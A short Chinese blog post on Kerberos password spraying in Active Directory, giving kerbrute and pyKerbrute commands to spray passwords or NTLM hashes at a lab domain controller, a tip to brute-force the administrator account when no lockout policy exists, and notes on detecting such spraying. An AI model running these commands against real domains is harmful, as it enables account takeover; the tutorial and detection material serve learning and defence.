域内密码喷洒

原理:请求包Cname对应的额值是用户名。用户名存在密码正确和密码错误两种情况的asrep返回包不一样。

密码喷洒和普通的爆破的区别在于 普通爆破利用固定的用户名爆破密码。密码喷洒用于 同一个密码爆破不同用户不触发账号锁定策略

工具使用

kerbrute 密码喷洒命令

kerbrute_windows_amd64.exe passwordspray --dc 10.211.55.4 -d xie.com user.txt p@ss1234

tips:如果探测到没有账户锁定策略 可以使用单向密码爆破

kerbrute_windows_amd64.exe bruteuser --dc 10.211.55.4 -d xie.com pass.txt administrator

pykerbrute密码喷洒

针对密码进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 udp

针对ntlm hash等进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash udp

防御:

1.流量层面 通过同一ip在短时间诶是否发送了大量的as-req包来判断。

2.日志层面:口令爆破成功是,会产生事件ID为4768的结果代码为0x0的审核成功kerberos身份验证服务时间日志。但默认是不记录该日志的需要开启审核和高级审核策略

posted @   lisenMiller  阅读(235)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示